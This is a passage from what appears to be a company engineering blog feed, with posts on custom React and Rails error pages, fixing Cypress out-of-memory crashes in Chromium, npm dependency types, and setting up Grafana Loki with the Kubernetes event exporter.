=&gt; ({  showErrorPage: false,  statusCode: 404,  failedApiUrl: &quot;&quot;,}));export default useDisplayErrorPage;</code></pre><p>The code snippet above creates a Zustand store for storing error-related data.Additionally, it provides a hook that conveniently checks whether an error hasoccurred anywhere within the application.</p><p>Back to our Axios interceptor, we can store the error using the<code>useDisplayErrorPage</code> hook.</p><pre><code class="language-js">import axios from &quot;axios&quot;;import { useErrorDisplayStore } from &quot;./useDisplayErrorPage&quot;;axios.interceptors.response.use(null, error =&gt; {  if (error.response?.status === 401) {    resetAuthTokens();    window.location.href = `/login?redirect_uri=${encodeURIComponent(      window.location.href    )}`;  } else {    const fullUrl = error.request?.responseURL || error.config.url;    const status = error.response?.status;    useErrorDisplayStore.setState({      showErrorPage: true,      statusCode: status,      failedApiUrl: fullUrl,    });  }  return Promise.reject(error);});</code></pre><h3>Display errors</h3><p>Now, we can use the <code>useDisplayErrorPage</code> hook at the root of our Reactapplication. When an error happens, <code>showErrorPage</code> will become <code>true</code>; we canuse that to show an error page.</p><pre><code class="language-jsx">import useDisplayErrorPage from &quot;./useDisplayErrorPage&quot;;import ErrorPage from &quot;./ErrorPage&quot;;const Main = () =&gt; {  const showErrorPage = useDisplayErrorPage();  if (showErrorPage) {    return &lt;ErrorPage /&gt;;  }  return &lt;&gt;Our App&lt;/&gt;;};</code></pre><p>Let's look at the <code>ErrorPage</code> component. The component reads the error data fromthe Zustand stores and displays the appropriate error message and the picture.</p><pre><code class="language-jsx">import { useErrorDisplayStore } from &quot;./useDisplayErrorPage&quot;;import { shallow } from &quot;zustand/shallow&quot;;const ERRORS = {  404: {    imageSrc: &quot;not-found.png&quot;,    errorMsg: &quot;The page you're looking for can't be found.&quot;,    title: &quot;Page not found&quot;,  },  403: {    imageSrc: &quot;unauthorized.png&quot;,    errorMsg: &quot;You don't have permission to access this page.&quot;,    title: &quot;Unauthorized&quot;,  },  500: {    imageSrc: &quot;server-error.png&quot;,    errorMsg:      &quot;The server encountered an error and could not complete your request.&quot;,    title: &quot;Internal server error&quot;,  },};const ErrorPage = ({ statusCode }) =&gt; {  const { storeStatusCode, showErrorPage } = useErrorDisplayStore(    pick([&quot;statusCode&quot;, &quot;showErrorPage&quot;]),    shallow  );  const status = statusCode || storeStatusCode;  const { imageSrc, errorMsg, title } = ERRORS[status] || ERRORS[404];  return (    &lt;div className=&quot;flex flex-col items-center justify-center h-screen&quot;&gt;      &lt;title&gt;{title}&lt;/title&gt;      &lt;img src={imageSrc} className=&quot;mb-4&quot; alt=&quot;Error Image&quot; /&gt;      &lt;div className=&quot;text-lg font-medium&quot;&gt;{errorMsg}&lt;/div&gt;    &lt;/div&gt;  );};</code></pre><h2>Custom error pages in Rails</h2><p>Ruby on Rails comes with default error pages for commonly encountered requestssuch as 404, 500, and 422 errors. Each request has an associated static HTMLpage located within the public directory. Even though we can customize them tolook like our <code>ErrorPage</code> component, maintaining error pages in different placeswill be difficult, and in the long run, they can go out of sync. So, we decidedto use the <code>ErrorPage</code> component for these scenarios as well.</p><p>To accomplish this, we'll start by creating a controller named<code>ErrorsController</code>. This controller will contain a single show action, wherewe'll extract the error code from the raised exception and render theappropriate view.</p><pre><code class="language-rb">class ErrorsController &lt; ApplicationController  before_action :set_default_format  def show    @status_code = params[:status_code] || &quot;404&quot;    error = @status_code == &quot;404&quot; ?  &quot;Not Found&quot; : &quot;Something went wrong!&quot;    if params[:url]      Rails.logger.warn &quot;ActionController::RoutingError (No route matches [#{request.method}] /#{params[:url]})&quot;    end    respond_to do |format|      format.json { render json: { error: }, status: @status_code }      format.any { render status: @status_code }    end  end  private    def set_default_format      request.format = :html unless request.format == :json    endend</code></pre><p>Next, we'll create a <code>view</code> file for this show action. In this view file, wewill render the <code>Error</code> component and pass <code>error_status_code</code> to it as props.</p><pre><code class="language-rb">&lt;%= react_component(&quot;Error&quot;, { error_status_code: @status_code }, { class: &quot;root-container&quot; }) %&gt;</code></pre><p>In the <code>Error</code> component, we will render the same <code>ErrorPage</code> component createdabove and pass the error status code received.</p><pre><code class="language-jsx">import React from &quot;react&quot;;import ErrorPage from &quot;./ErrorPage&quot;;const reactProps = JSON.parse(  document.getElementsByClassName(&quot;root-container&quot;)[0]?.dataset?.reactProps ||    &quot;{}&quot;);const Error = () =&gt; &lt;ErrorPage status={reactProps.error_status_code} /&gt;;export default Error;</code></pre><p>Now add the following route in the <code>config/routes.rb</code> file to point <code>404</code> and<code>500</code> requests to the <code>show</code> action in the <code>ErrorsController</code>.</p><pre><code class="language-rb">Rails.application.routes.draw do  match &quot;/:status_code&quot;, constraints: { status_code: /404|500/, format: :html }, to: &quot;errors#show&quot;, via: :allend</code></pre><p>Finally, we need to tell the Rails application to use our new controller androutes setup instead of those HTML templates in the public directory. For this,add the following to the <code>class Application &lt; Rails::Application</code> block in<code>config/application.rb</code> file.</p><pre><code class="language-rb">config.exceptions_app = self.routes</code></pre><h3>Handling unmatched routes</h3><p>Sometimes, we get random requests from bots and crawlers to access the pathsthat don't exist. When this occurs, our server raises an<code>ActionController::RoutingError</code> exception. This also happens when a usermistypes a URL. However, in such cases, instead of just throwing the exception,we should inform the user that what they are requesting does not exist byshowing a 404 page.</p><p>To handle this, we implemented a <code>catch_all</code> route, as the name suggests, whichcatches any routes that don't match already defined routes, which will be placedat the end of our routes configuration. This placement ensures that it is onlycalled if a request doesn't match any other defined route.</p><pre><code class="language-rb">Rails.application.routes.draw do  #Define other routes here...  #Catch-all route for handling errors  match &quot;:url&quot;, to: &quot;errors#show&quot;, via: :all, url: /.*/, constraints: -&gt; (request) do    request.path.exclude?(&quot;/rails/&quot;)  endend</code></pre><p>This route also uses the same <code>ErrorsController</code> mentioned above for handlingunmatched requests and will show a 404 page.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we fixed the Cypress "Out of memory" error for Chromium browsers]]></title>
       <author><name>S Varun</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers"/>
      <updated>2024-05-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers</id>
      <content type="html"><![CDATA[<p>At BigBinary, we use <a href="https://www.cypress.io/">Cypress</a> as our primaryend-to-end testing framework because of its simplicity and compatibility. Wehave 400+ tests across multiple products, most of which are long-running testshandling complex workflows. We use the most commonly used version of<a href="https://www.chromium.org/Home/">Chromium</a> as the test browser to make sure thetests capture how the majority uses our products. While the development hasalways been smooth sailing, the same cannot be said about the test runs. As thenumber of tests and the duration for each of them increased, our tests wouldrandomly crash with the following error:</p><pre><code>We detected that the Chromium Renderer process just crashed.This is the equivalent of seeing the 'sad face' when Chrome dies.This can happen for a number of different reasons:- You wrote an endless loop and you must fix your own code- You are running Docker (there is an easy fix for this: see link below)- You are running lots of tests on a memory intense application.    - Try enabling experimentalMemoryManagement in your config file.    - Try lowering numTestsKeptInMemory in your config file.- You are running in a memory starved VM environment.    - Try enabling experimentalMemoryManagement in your config file.    - Try lowering numTestsKeptInMemory in your config file.- There are problems with your GPU / GPU drivers- There are browser bugs in ChromiumYou can learn more, including how to fix Docker here:https://on.cypress.io/renderer-process-crashed</code></pre><p>The occurrence of the crashes was rare initially. But as our test suitesexpanded the crash frequency increased as well. The crashes were so frequent ata point in time that none of our tests would run to completion. Neither thesolutions mentioned in the official documentation nor the suggestions in thecommunity discussions (like enabling experimentalMemoryManagement) wereeffective. This led us to investigate this problem.</p><h2>About our CI setup</h2><p>We used to run Cypress on<a href="https://circleci.com/docs/configuration-reference/#docker-execution-environment">CircleCI</a>on a medium Docker resource class. This resource class allocates 4GB of memoryto the process. Later on, we moved to our home-grown CI solution,<a href="https://www.neeto.com/neetoci/">NeetoCI</a> for running our Cypress tests whichgave us much more control over the test environment.</p><h2>The investigation setup</h2><p>Since the errors were caused because Cypress ran out of memory, we started bylooking into the resource utilization on the VM environment. We noticed thatnone of the crashed runs used more than 50% of the allotted memory. The memorystarvation while using only a portion of the allocated resources, meant thatCypress was not utilizing the full memory.</p><p>We couldn't reproduce this issue reliably, so we attempted to simulate the errorby creating a high memory usage scenario. For the simulation, we created a dummytest that takes the following steps.</p><ol><li>Visit a page.</li><li>Get an element.</li><li>Save the element in the memory as a new alias.</li><li>Repeat steps 1-3 infinitely until the browser crashes.</li><li>During each iteration, log the iteration number to know how many iterationswere completed successfully before the crash.</li></ol><p>For logging the iteration number, we used the<a href="https://docs.cypress.io/api/commands/task">Cypress task - log</a> is illustratedin the official documentation. The iteration number provided us with anadditional metric to compare the performance of the solutions we tried. The codefor implementing the investigation setup can be seen below.</p><pre><code class="language-javascript">const saveButtonAsAlias = iteration =&gt; {  cy.get(&quot;.button&quot;).as(`button-${iteration}`);  saveButtonAsAlias(iteration + 1);  cy.task(&quot;log&quot;, iteration);};it(&quot;dummy test&quot;, () =&gt; {  cy.visit(&quot;/&quot;);  saveButtonAsAlias(1);});</code></pre><p>The above code will save the same button component as different aliases in thememory thus simulating a high memory usage test environment. On executing thistest we saw that the memory usage peaked at about 1GB - 1.5GB in a 4GB dockerenvironment before the browser crashed.</p><h2>Solutions</h2><h3>1. Using an alternate browser</h3><p>Even though <a href="https://www.google.com/chrome/">Google Chrome</a> is the most popularbrowser in the market, it's far from being the most memory-efficient. So wetested out with other chromium-based browsers available for Cypress andconcluded that <a href="https://www.microsoft.com/en-us/edge">Microsoft Edge</a> ran thetests in a much more memory-efficient manner. While running the dummy test, weobserved the memory usage by each of the browsers and compared the results.</p><p>Google Chrome ran the tests faster and crashed first when memory was starved.Microsoft Edge ran the tests at a similar pace initially, but when the memorywas almost used up completely, the tests slowed dow,n and the browser startedrigorous garbage collection. The memory usage was increasing at a gradual rateand more iterations were completed successfully, as compared to Chrome, beforethe browser crashed. The table below shows the runtime comparison between GoogleChrome and Microsoft Edge (higher runtime is better).</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Attempt &lt;/td&gt;&lt;td&gt; Google Chrome runtime before crash &lt;/td&gt;&lt;td&gt; Microsoft Edge runtime before crash &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;0:45&lt;/td&gt;&lt;td&gt;0:59&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;2&lt;/td&gt;&lt;td&gt;0:46&lt;/td&gt;&lt;td&gt;1:00&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;3&lt;/td&gt;&lt;td&gt;0:45&lt;/td&gt;&lt;td&gt;1:01&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><p>While switching the browser improved the completion rate of the runs, it stilldidn't solve the issue completely. This led us to look for further enhancements.</p><h3>2. Increasing the max-old-space-size</h3><p>The most unusual behaviour we noticed in resource utilization was that Cypressdid not use the entire allocated memory before crashing. To understand whyCypress behaves like this we need to have a basic understanding of itsarchitecture which can be seen below.</p><p><img src="/blog_images/2024/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers/cypress-architecture.png" alt="Cypress architecture"></p><p>Cypress works as two different processes. The NodeJS application and the browseron which the tests run. When executing <code>cypress run</code> and <code>cypress open</code>commands, we start the NodeJS application. This NodeJS application goes throughour tests and configuration and loads them into our preferred browser where theyare executed.</p><p>The split architecture of Cypress means that the memory allocation for theNodeJS process and the Chromium browser are different. This is why the totalmemory usage by the NodeJS process doesn't give us proper insights into why theChromium process crashed and was starved of memory. To analyze the browsermemory usage we used the browser<a href="https://developer.mozilla.org/en-US/docs/Web/API/Performance/memory">Performance APIs</a>.</p><p>We found that the Cypress tests were allocated only about 500MB of memorydespite the test environment having 4GB of memory. So the solution was toincrease the heap memory allocated to the chromium renderer. The<a href="https://nodejs.org/api/cli.html#--max-old-space-sizesize-in-megabytes:~:text=are%20documented%20here%3A-,%2D%2Dmax%2Dold%2Dspace%2Dsize%3DSIZE,-(in%20megabytes)">max-old-space-size</a>command-line flag is used to set the V8 engine's maximum old memory limit. Whenthe memory usage approaches this limit, garbage collection begins in an effortto free up memory. So by manually increasing the <code>max-old-space-size</code> for thechromium renderer, we can increase the heap memory allocated to it.</p><p>If it were a node application, the process of increasing the<code>max-old-space-size</code> would be as simple as executing the Cypress commandlike-wise:</p><p><code>NODE_OPTIONS=--max-old-space-size=3500 yarn cypress run</code></p><p>But because of the split architecture, executing the above command onlyincreases the <code>max-old-space-size</code> for the NodeJS application and not the actualCypress tests running in the Chromium browser. To increase the<code>max-old-space-size</code> for the Chromium renderer we need to make use of the<a href="https://docs.cypress.io/api/plugins/browser-launch-api">Browser launch APIs</a>provided by Cypress.</p><pre><code class="language-javascript">// cypress.config.jsconst { defineConfig } = require(&quot;cypress&quot;);module.exports = defineConfig({  // setupNodeEvents can be defined in either  // the e2e or component configuration  e2e: {    setupNodeEvents(on, config) {      on(&quot;before:browser:launch&quot;, (browser = {}, launchOptions) =&gt; {        launchOptions.args.push(&quot;--js-flags=--max-old-space-size=3500&quot;);        return launchOptions;      });    },  },});</code></pre><p>In the configuration above, we can see that we have passed in the<code>--max-old-space-size</code> command line flag within the <code>--js-flags</code> Chromium flag.This is because Chromium expects NodeJS options using the <code>--js-flags</code> commandline switch. The above configuration increases the maximum usable heap size ofthe Cypress tests to 3500MB.</p><p>Depending on the available memory on the test environment, we can increase ordecrease the <code>max-old-space-size</code> value. The benchmarking results we receivedafter making this configuration change showed a significant improvement in theperformance. The table below documents the runtime comparison between thedefault <code>max-old-space-size</code> and <code>max-old-space-size</code> set to 3500 MB (higherruntime is better).</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Attempt &lt;/td&gt;&lt;td&gt;Runtime before crash with default &lt;code&gt;max-old-space-size&lt;/code&gt;&lt;/td&gt;&lt;td&gt;Runtime before crash with &lt;code&gt;max-old-space-size=3500&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;0:44&lt;/td&gt;&lt;td&gt;2:22&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;2&lt;/td&gt;&lt;td&gt;0:45&lt;/td&gt;&lt;td&gt;2:20&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;3&lt;/td&gt;&lt;td&gt;0:45&lt;/td&gt;&lt;td&gt;2:21&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><p>The benchmark above shows the improvement in performance after increasing the<code>max-old-space-size</code> in the Google Chrome browser. By switching the browser toMicrosoft Edge we got even better results. The table below shows the runtimecomparison between the default <code>max-old-space-size</code> and <code>max-old-space-size</code> setto 3500 MB in each of these browsers (higher runtime is better).</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Attempt &lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt;Runtime before crash with default &lt;code&gt;max-old-space-size&lt;/code&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt;Runtime before crash with &lt;code&gt;max-old-space-size=3500&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;Google Chrome&lt;/td&gt;&lt;td&gt;Microsoft Edge&lt;/td&gt;&lt;td&gt;Google Chrome&lt;/td&gt;&lt;td&gt;Microsoft Edge&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;0:44&lt;/td&gt;&lt;td&gt;0:59&lt;/td&gt;&lt;td&gt;2:22&lt;/td&gt;&lt;td&gt;2:40&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;2&lt;/td&gt;&lt;td&gt;0:45&lt;/td&gt;&lt;td&gt;1:00&lt;/td&gt;&lt;td&gt;2:20&lt;/td&gt;&lt;td&gt;2:38&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;0:45&lt;/td&gt;&lt;td&gt;1:01&lt;/td&gt;&lt;td&gt;2:21&lt;/td&gt;&lt;td&gt;2:37&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><h2>Additional tips to reduce memory usage in Cypress</h2><ol><li><p>Chromium browsers sandbox the pages which increases the memory usage. Sincewe're running the Cypress tests on trusted sites, we can enable the<code>--no-sandbox</code> flag to reduce memory consumption.</p></li><li><p>When running Cypress tests in headless mode, we can disable the WebGLgraphics on the rendered pages to avoid additional memory usage by passingthe <code>--disable-gl-drawing-for-tests</code> flag.</p></li><li><p>When running tests on low-resource machines, using hardware acceleration canimpact performance. To avoid this we can pass the <code>--disable-gpu</code> flag.</p></li></ol><pre><code class="language-javascript">// cypress.config.jsconst { defineConfig } = require(&quot;cypress&quot;);module.exports = defineConfig({  // setupNodeEvents can be defined in either  // the e2e or component configuration  e2e: {    setupNodeEvents(on, config) {      on(&quot;before:browser:launch&quot;, (browser, launchOptions) =&gt; {        if ([&quot;chrome&quot;, &quot;edge&quot;].includes(browser.name)) {          if (browser.isHeadless) {            launchOptions.args.push(&quot;--no-sandbox&quot;);            launchOptions.args.push(&quot;--disable-gl-drawing-for-tests&quot;);            launchOptions.args.push(&quot;--disable-gpu&quot;);          }          launchOptions.args.push(&quot;--js-flags=--max-old-space-size=3500&quot;);        }        return launchOptions;      });    },  },});</code></pre><h2>Conclusion</h2><p>Since Cypress tests are executed inside the browser all the constraints of abrowser environment apply to them, including the memory constraints. The defaultconfigurations in the browsers are targeted to run on the most number ofsystems. When facing memory starvation issues during complex and long-runningtests, we should configure Cypress according to the resources available in theenvironment in which our tests are running to achieve peak performance.Increasing the available memory for the browser by manually setting anappropriate <code>max-old-space-size</code> value and choosing a memory-efficient browserwill make sure that Cypress will be able to run smoothly in most of thescenarios.</p><h2>References</h2><ul><li><a href="https://github.com/cypress-io/cypress/issues/24719">Chromium renderer crash GitHub issue</a></li><li><a href="https://www.memorymanagement.org/glossary/s.html">Memory management glossary</a></li><li><a href="https://support.circleci.com/hc/en-us/articles/360009208393-How-Can-I-Increase-the-Max-Memory-for-Node">Increasing node memory size</a></li><li><a href="https://github.com/cypress-io/cypress-docker-images/blob/master/included/10.0.0/Dockerfile">Cypress docker images</a></li><li><a href="https://peter.sh/experiments/chromium-command-line-switches">Chromium command-line switches</a></li><li><a href="https://docs.docker.com/config/containers/resource_constraints/">Docker resource constraints</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Difference between dependencies, devDependencies and peerDependencies]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/different-dependencies"/>
      <updated>2024-05-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/different-dependencies</id>
      <content type="html"><![CDATA[<p>In a JavaScript project, understanding the distinctions between <code>dependencies</code>,<code>devDependencies</code>, and <code>peerDependencies</code> is crucial for effective packagemanagement. Each plays a distinct role in shaping how a project is built anddistributed. In this blog, we'll explore these terms and their differences.</p><h2>dependencies</h2><p>The packages that are really needed for a project to function should be listedunder <code>dependencies</code>. These packages are always installed within that project.If the project is also a package, then these dependencies will also getinstalled in the host project that uses this package. Below are some commonexamples of what might go under <code>dependencies</code>.</p><pre><code class="language-json"> &quot;dependencies&quot;: {   &quot;dayjs&quot;: &quot;1.11.1&quot;,   &quot;immer&quot;: &quot;^10.0.2&quot;,   &quot;ramda&quot;: &quot;^0.29.0&quot;,   &quot;react&quot;: &quot;^18.2.0&quot; }</code></pre><p>It's important to understand that the above packages do not always have to beunder <code>dependencies</code>. For example, if <code>dayjs</code> is needed only for development,deployment or testing purposes, It should not be listed under <code>dependencies</code> butrather in the <code>devDependencies</code> section, because <code>dependencies</code> will be bundledwith the main code, whereas <code>devDependencies</code> will not. So adding dependenciesthat are only used in development purposes under <code>dependencies</code> is unnecessaryand will increase the bundle size, affecting the performance of the application.</p><p>To add a package to <code>dependencies</code> section, simply run:</p><pre><code class="language-bash">yarn add package-name</code></pre><p>If we are shipping a package, all our dependencies are installed in the root ofhost projects <code>node_modules</code>. However, an exception occurs if the host projectalready has the same dependency but with a different version. In this scenario,that specific conflicting dependency will be installed within the <code>node_modules</code>of our package to avoid version conflicts.</p><p>To explain it bit more lets say we have <code>dayjs@1.0.0</code> as one of our dependencybut the host project uses <code>2.0.0</code>. Then both versions will be installed, <code>2.0.0</code>would be the in root <code>node_modules</code> and <code>1.0.0</code> in our package's <code>node_modules</code>.This way, our package can continue to use <code>1.0.0</code> while the host uses <code>2.0.0</code>. Thefolder structure of that host will look something like below.</p><pre><code class="language-javascript">host-project-app src    index.js node_modules    react    dayjs    my-awesome-lib      node_modules        dayjs package.json README.md</code></pre><h2>devDependencies</h2><p>Packages listed in <code>devDependencies</code> are used specifically for developmentpurposes. Any dependencies that do not go into our actual code are listed hereand not under <code>dependencies</code>. These dependencies won't be installed in aproduction environment or in a host project if our project acts as a package.Here are a few examples of what might belong in <code>devDependencies</code>.</p><pre><code class="language-json"> &quot;devDependencies&quot;: {    &quot;@babel/core&quot;: &quot;^7.16.5&quot;,    &quot;eslint&quot;: &quot;^8.41.0&quot;,    &quot;husky&quot;: &quot;^7.0.4&quot;,    &quot;jest&quot;: &quot;27.5.1&quot;,    &quot;prettier&quot;: &quot;^2.8.8&quot; }</code></pre><p>Just like in <code>dependencies</code>, these packages may not always be in<code>devDependencies</code>. For example, if we are building a package that enhances Jesttests capabilities, then we should place <code>jest</code> under <code>dependencies</code>. Otherwiseour host project will break, because <code>jest</code> will not be installed in the hostproject.</p><p>To add a package to <code>devDependencies</code> section, simply run:</p><pre><code class="language-bash">yarn add -D package-name</code></pre><h2>peerDependencies</h2><p><code>peerDependencies</code> are needed only if we are building a package. It allows hostto install any desired version unless we specify otherwise.</p><p>If we are using <code>yarn</code> as the package manager then <code>peerDependencies</code> are notinstalled automatically. We have to install manually, even in our own package.But there is a slight difference if you are using <code>npm</code>. Up to version 6 <code>npm</code>does not install <code>peerDependencies</code> automatically. However, this changes fromversion 7 onwards, as it will install <code>peerDependencies</code> automatically. So if weare using <code>yarn</code> or <code>npm&lt;=v6</code> and we have for example Storybook or Jest tests inour package project, then we have to install <code>peerDependencies</code> as<code>devDependencies</code>(not as <code>dependencies</code> which defeats the purpose) as well.</p><pre><code class="language-json"> &quot;devDependencies&quot;: {    &quot;@babel/core&quot;: &quot;^7.16.5&quot;,    &quot;eslint&quot;: &quot;^8.41.0&quot;,    &quot;husky&quot;: &quot;^7.0.4&quot;,    &quot;jest&quot;: &quot;27.5.1&quot;,    &quot;prettier&quot;: &quot;^2.8.8&quot;,    &quot;dayjs&quot;: &quot;1.11.1&quot;, } &quot;peerDependencies&quot;: {    &quot;dayjs&quot;: &quot;latest&quot; }</code></pre><p>You might wonder about its purpose if manual installation is required. It servesas a means for our package project to specify essential dependencies requiredfor the package to function properly. Simultaneously, it grants control to thehost project to choose which versions to install.</p><p>To add a package to <code>peerDependencies</code> section, simply run:</p><pre><code class="language-bash">yarn add --peer package-name</code></pre><p>Now the tricky part is determining whether a particular dependency should gounder <code>dependencies</code> or <code>peerDependencies</code>. Unfortunately, there is no clearanswer here. But there are some questions we can ask ourselves to narrow it down.</p><ol><li><p>If the specific version of the dependency is important for our package, thatis if using a different version breaks our package, then definitely we wantto place that package under <code>dependencies</code>.</p><p>It is possible to place such dependencies under <code>peerDependencies</code> andspecify supported versions like below, but it is not a good practice.</p></li></ol><pre><code class="language-json"> &quot;peerDependencies&quot;: {    &quot;dayjs&quot;: &quot;1.2.0 || 1.5.1&quot;, }</code></pre><ol start="2"><li>If the dependency is a widely used package like <code>react</code>, better place itunder <code>peerDependency</code>and ensure that our package works with differentversion of that dependency. This way, the dependency installed in the hostproject can be reused by our package without installing a separate version.</li><li>If we want to make changes to a dependency in a manner that impacts its usagewithin the host project, then place it under <code>peerDependencies</code>. Good exampleof this is, at <a href="https://www.neeto.com/">neeto</a> we have a package called<code>neeto-commons-frontend</code> which extracts numerous common functionalitiesutilized across various products. One such functionality is our errorhandling system, for which we use an<a href="https://axios-http.com/docs/interceptors">Axios interceptor</a>. To ensure thefunctionality of this interceptor, it's crucial to apply this interceptor tothe same instance of Axios. To elaborate further, if we add Axios under<code>dependencies</code> in <code>neeto-commons-frontend</code>, but the host project uses adifferent Axios version, we will be making changes to the Axios instancethat's in <code>node_modules</code> of <code>neeto-commons-frontend</code> and not of the hostproject, means the functionality will not work on the host project.</li></ol><p>Another rationale behind utilizing <code>peerDependencies</code> is its substantial impacton reducing the bundle size, particularly when bundling our package. Now if weare using Rollup, placing certain packages under <code>peerDependencies</code> doesn'tautomatically exclude them from the bundle. We need to explicitly specify thisin the Rollup configuration. This is achieved through the Rollup <code>external</code>configuration option, where we provide a list of <code>peerDependencies</code> to beexcluded from the bundle. To simplify this process,<code>rollup-plugin-peer-deps-external</code> automates the inclusion of <code>peerDependencies</code>within the <code>external</code> configuration.</p><pre><code class="language-js">import peerDepsExternal from &quot;rollup-plugin-peer-deps-external&quot;;export default {  plugins: [    // Preferably set as first plugin.    peerDepsExternal(),  ],};</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Grafana Loki and Kubernetes Event exporter]]></title>
       <author><name>Vishal Yadav</name></author>
      <link href="https://www.bigbinary.com/blog/k8s-event-exporter-and-grafana-loki-integration"/>
      <updated>2024-05-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/k8s-event-exporter-and-grafana-loki-integration</id>
      <content type="html"><![CDATA[<p>In the previous<a href="https://www.bigbinary.com/blog/prometheus-and-grafana-integration">blog</a>, wediscussed integrating <a href="https://prometheus.io/">Prometheus</a> and<a href="https://grafana.com/">Grafana</a> in the Kubernetes Cluster. In this blog, we'llexplore how to integrate the<a href="https://github.com/resmoio/kubernetes-event-exporter">Kubernetes Event exporter</a>&amp; <a href="https://grafana.com/oss/loki/">Grafana Loki</a> into your Kubernetes Clusterusing a helm chart.</p><p>Additionally, youll also learn how to add Grafana Loki as a data source to yourGrafana Dashboard. This will help you visualize the Kubernetes events.</p><p>Furthermore, we'll delve into the specifics of setting up the Event exporter andGrafana Loki, ensuring you understand each step of the process. From downloadingand configuring the necessary helm charts to understanding the Grafana Lokidashboard, we'll cover it all.</p><p>By the end of this blog, you'll be able to fully utilize Grafana Loki andKubernetes Event Exporter, gaining insights from your Kubernetes events.</p><h2>How Kubernetes event exporter can help us in monitoring health</h2><p>Objects in Kubernetes, such as Pod, Deployment, Ingress, Service publish eventsto indicate status updates or problems. Most of the time, these events areoverlooked and their 1-hour lifespan might cause missing important updates. Theyare also not searchable and cannot be aggregated.</p><p>For instance, they can alert you to changes in the state of pods, errors inscheduling, and resource constraints. Therefore, exporting these events andvisualizing them can be crucial for maintaining the health of your cluster.</p><p>Kubernetes event exporter allows exporting the often missed Kubernetes events tovarious outputs so that they can be used for observability or alerting purposes.We can have multiple receivers to export the events from the Kubernetes cluster.</p><ul><li><a href="https://www.opsgenie.com/">Opsgenie</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#webhookshttp">Webhooks/HTTP</a></li><li><a href="https://www.elastic.co/">Elasticsearch</a></li><li><a href="https://opensearch.org/">OpenSearch</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#slack">Slack</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#kinesis">Kinesis</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#firehose">Firehose</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#sns">SNS</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#sqs">SQS</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#file">File</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#stdout">Stdout</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#kafka">Kafka</a></li><li><a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/OpsCenter.html">OpsCenter</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#customizing-payload">Customize Payload</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#pubsub">Pubsub</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#teams">Teams</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#syslog">Syslog</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#bigquery">Bigquery</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#pipe">Pipe</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#aws-eventbridge">Event Bridge</a></li><li><a href="https://github.com/resmoio/kubernetes-event-exporter#loki">Grafana Loki</a></li></ul><h2>Setting up Grafana Loki &amp; Kubernetes event exporter using Helm chart</h2><p>We will once again use <a href="https://artifacthub.io/">ArtifactHub</a>, which provides ahelm chart for installing Grafana Loki onto a Kubernetes Cluster. If you needinstructions on how to install Helm on your system, you can refer to this blog.</p><p>In this blog post, we will install a Helm<a href="https://artifacthub.io/packages/helm/grafana/loki">chart</a> that sets up Loki inscalable mode, with separate read-and-write components that can be independentlyscaled. Alternatively, we can install Loki in monolithic mode, where the HelmChart installation runs the Grafana Loki <em>single binary</em> within a Kubernetescluster. You can learn more about this<a href="https://grafana.com/docs/loki/latest/setup/install/helm/install-monolithic/#install-the-monolithic-helm-chart">here</a>.</p><h3>1. Create S3 buckets</h3><ul><li><p>grafana-loki-chunks-bucket</p></li><li><p>grafana-loki-admin-bucket</p></li><li><p>grafana-loki-ruler-bucket</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-s3-buckets.png" alt="loki-s3-buckets.png"></p></li></ul><h3>2. Create a policy for Grafana Loki</h3><p>Create a new policy under IAM on Amazon AWS using the below snippet.</p><pre><code>{    &quot;Version&quot;: &quot;2012-10-17&quot;,    &quot;Statement&quot;: [        {            